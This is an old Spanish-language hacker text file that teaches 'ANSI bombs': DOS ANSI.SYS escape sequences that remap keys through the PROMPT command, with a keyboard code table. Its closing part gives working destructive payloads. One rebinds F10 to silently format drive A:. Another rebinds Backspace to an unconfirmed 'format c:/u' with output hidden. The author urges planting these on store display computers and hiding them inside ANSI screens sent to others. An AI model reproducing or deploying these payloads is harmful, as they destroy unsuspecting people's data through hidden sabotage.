***************************************************************************     
*    BOMBAS ANSI, TAMBIEN LLAMADAS "DIOS MIO MI ORDENADOR ESTA POSEIDO"   *
***************************************************************************           
                           **  Por El Jomles   ** 
                              ****************
  Hola estamos aqui para enseñaaros lo que es y como se hace una BOMBA ANSI
pero primero os explicaremos que es el ANSI,es un controlador que define 
cambian graficos de presentacion ,dicen donde debe salir el cursor o cambiar
las teclas(Como si estuvieras en un ascensor le dieras al primero aparecieses
en el cuarto o sonara la alarma,que risa no ,je je ;-]). 
  El controlador ANSI.SYS permite emular secuencias de escape para controlar 
la pantalla y el teclado . 
  Las secuencias de escape ANSI son caracteres ASCII, los dos primeros 
caracteres son 1Bh(caracter de escape) y 5Bh (corchete izquierdo). 
  Los caracteres que van detras del escape y el corchete definen un codigo
que controla la presentacion de pantalla o el control de teclado.
  Tambien hay que tener en cuenta que el valor de una mayuscula es distinto
al de una minuscula , "Z"=90,5AH  y "z"=122,7AH.
  El controlador ANSI debe ser cargado desde el config.sys y viene con el 
MS-DOS ,si no lo tienes pideselo a algun amigo .
  A continuacion escribire las algunas secuencias de escape como ejemplo:
      
ESC[PL;Pcf , ESC[PL;PcH
    Posición del cursor: PL=>Lineas ,la "X"  ;Pc=>Columnas ,la"Y"
    si no se especifica ningun valor ,la posicion sera la 0,0.
 
ESC[s
    Guardar posición del cursor: Es como la funcion PUSH del Ensamblador.
    Asi podremos mover el cursor donde queramos y luego lo dejaremos 
    donde estaba con la orden de restaura.

ESC[u
    Restaurar posición del cursor: Es como la funcion POP del Ensamblador.
    Volvemos a dejar el cursor de donde lo cogimos.

ESC[2J
    Borrar presentación: Borra la pantalla y mueve el cursor a la
    posición de inicio (línea 0, columna 0).
 
  Estas secuencias son simplemente como ejemplo, para saber mas podeis mirar  
en algun manual de MS-DOS o en la ayuda de este controlador (Help ansi.sys).
  Si enviamos a alguien estas secuencias sera mejor enviarlas con una 
pantalla para que no se note . 
  Nosotros para hacer estas bombas utilizaremos el comando Prompt ,
cualquiera que sepa un poco de programacion podra hacer un pequeñoo programa 
o una pantalla, que cambie las teclas a su gusto.

  Estos son los codigos del teclado, habra que escoger el valor determinado
por la tabla para cada funcion.
  Queremos intercambiar las teclas "v" y "b" es decir que cuando alguien 
pulse la b salga una v(P ej."haviamos benido para berte pero no estava 
avierto),queda raro no .Para hacer esto ,lo podemos hacer de dos formas
distintas:

        Prompt $e[98;118p$p$g        Cambia la "b" por la "v".
        
        Prompt $e["v";"b"p$p$g       Cambia la "v" por la "b".
  
  Ahora la teclas estan intercambiadas ,pero solo las minusculas, si queremos
intercambiar tambien las mayusculas haremos lo mismo pero cambiando los 
codigos. Podemos intercambiar el valor y el caracter entrecomillado: 

        Prompt $e["b";118p$p$g  
        
Tecla                         Código    MAYS+código  CTRL+código  ALT+código
****************************************************************************
 
F1                            0;59      0;84         0;94         0;104
 
F2                            0;60      0;85         0;95         0;105
 
F3                            0;61      0;86         0;96         0;106
 
F4                            0;62      0;87         0;97         0;107
 
F5                            0;63      0;88         0;98         0;108
 
F6                            0;64      0;89         0;99         0;109
 
F7                            0;65      0;90         0;100        0;110
 
F8                            0;66      0;91         0;101        0;111
 
F9                            0;67      0;92         0;102        0;112
 
F10                           0;68      0;93         0;103        0;113
 
F11                           0;133     0;135        0;137        0;139
 
F12                           0;134     0;136        0;138        0;140
 
INICIO                        0;71      55           0;119        --
 
FLECHA ARRIBA                 0;72      56           (0;141)      --
 
RE PAGINA                     0;73      57           0;132        --
 
FLECHA IZQUIERDA              0;75      52           0;115        --
 
FLECHA DERECHA                0;77      54           0;116        --
 
FIN                           0;79      49           0;117        --
 
FLECHA ABAJO                  0;80      50           (0;145)      --
 
AV PAGINA                     0;81      51           0;118        --
 
INSERTAR                      0;82      48           (0;146)      --
 
SUPRIMIR                      0;83      46           (0;147)      --
 
INCIO (tecla gris)            (224;71)  (224;71)     (224;119)    (224;151)
 
FLECHA ARRIBA (tecla gris)    (224;72)  (224;72)     (224;141)    (224;152)
 
RE PAGINA (tecla gris)        (224;73)  (224;73)     (224;132)    (224;153)
 
FLECHA IZQIERDA (tecla        (224;75)  (224;75)     (224;115)    (224;155)
gris)
 
FLECHA DERECHA (tecla gris)   (224;77)  (224;77)     (224;116)    (224;157)
 
FIN (flecha gris)             (224;79)  (224;79)     (224;117)    (224;159)
 
FLECHA ABAJO (tecla gris)     (224;80)  (224;80)     (224;145)    (224;154)
 
AV PAGINA (tecla gris)        (224;81)  (224;81)     (224;118)    (224;161)
 
INSERTAR (tecla gris)         (224;82)  (224;82)     (224;146)    (224;162)
 
SUPRIMIR (tecla gris)         (224;83)  (224;83)     (224;147)    (224;163)
 
IMPRIMIR PANTALLA             --        --           0;114        --
 
PAUSA/INTERRUMPIR             --        --           0;0          --
 
RETROCESO                     8         8            127          (0)
 
ENTRAR                        13        ---          10           (0
 
TAB                           9         0;15         (0;148)      (0;165)
 
NULO                          0;3       --           --           --
 
A                             97        65           1            0;30
 
B                             98        66           2            0;48
 
C                             99        66           3            0;46
 
D                             100       68           4            0;32
 
E                             101       69           5            0;18
 
F                             102       70           6            0;33
 
G                             103       71           7            0;34
 
H                             104       72           8            0;35
 
I                             105       73           9            0;23
 
J                             106       74           10           0;36
 
K                             107       75           11           0;37
 
L                             108       76           12           0;38
 
M                             109       77           13           0;50
 
N                             110       78           14           0;49
 
O                             111       79           15           0;24
 
P                             112       80           16           0;25
 
Q                             113       81           17           0;16
 
R                             114       82           18           0;19
 
S                             115       83           19           0;31
 
T                             116       84           20           0;20
 
U                             117       85           21           0;22
 
V                             118       86           22           0;47
 
W                             119       87           23           0;17
 
X                             120       88           24           0;45
 
Y                             121       89           25           0;21
 
Z                             122       90           26           0;44
 
1                             49        33           ---          0;120
 
2                             50        64           0            0;121
 
3                             51        35           ---          0;122
 
4                             52        36           ---          0;123
 
5                             53        37           ---          0;124
 
6                             54        94           30           0;125
 
7                             55        38           ---          0;126
 
8                             56        42           ---          0;126
 
9                             57        40           ---          0;127
 
0                             48        41           ---          0;129
 
-                             45        95           31           0;130
 
=                             61        43           ---          0;131
 
[                             91        123          27           0;26
 
]                             93        125          29           0;27
 
                              92        124          28           0;43
 
;                             59        58           ---          0;39
 
'                             39        34           ---          0;40
 
,                             44        60           ---          0;51
 
.                             46        62           ---          0;52
 
/                             47        63           ---          0;53
 
`                             96        126          ---          (0;41)
 
ENTRAR (teclado)              13        ---          10           (0;166)
 
/ (teclado numérico)          47        47           (0;142)      (0;74)
 
* (teclado numérico)          42        (0;144)      (0;78)       ---
 
- (teclado numérico)          45        45           (0;149)      (0;164)
 
+ (teclado numérico)          43        43           (0;150)      (0;55)
 
5 (teclado numérico)          (0;76)    53           (0;143)      ---
**************************************************************************** 
  Ahora reprogramemos una tecla de funcion ,para que pulsando la tecla F10
formatee la unidad A

            Prompt $e[0;68;"Format A:";13p$p$g

  mejor sera que redirigamos la salida a standard para que no se vea por pantalla lo
que estamos haciendo, no?

            Prompt $e[0;68;"Format A:>nul";13p$p$g

   

  Tambien podemos asignar funciones a teclas, vamos caminando por ejemplo
por la seccion de informatica de una gran superficie o algo parecido, de
la que se suelen encargar se¤oritas muy arregladas y muy amables(nunca con
nosotros)que casi siempre no tienen puta idea de ordenadores, que cuando 
te ven tocando uno se te tiran al cuello diciendo "­­­­NO SE TOCAAAA!!!!".
  Pues a estas "señoritas" esta dedicado esto:
                                                      
Prompt $e[8;"Echo |S format c:/u >nul";13p$p$gLos del XXXX son unos ladrones    
                                                     

 Echo |s                             =>Responde "SI" por ti.
 13                                  =>Es el codigo de return.  
 p$p$gLos del XXXX son unos ladrones =>Saca por pantalla:
                                   "C:\>Los de la(tienda)son unos ladrones"
 
  Cuando la atenta vendedora nos vea en el ordenador ira a ver lo que hacemos
aunque ante de que llegue ya nos deberiamos haber ido. Cuando vea el mensaje 
lo borrara y...adios al disco duro.
  

***********************************FIN*****************************************

Por hoy esto es todo.
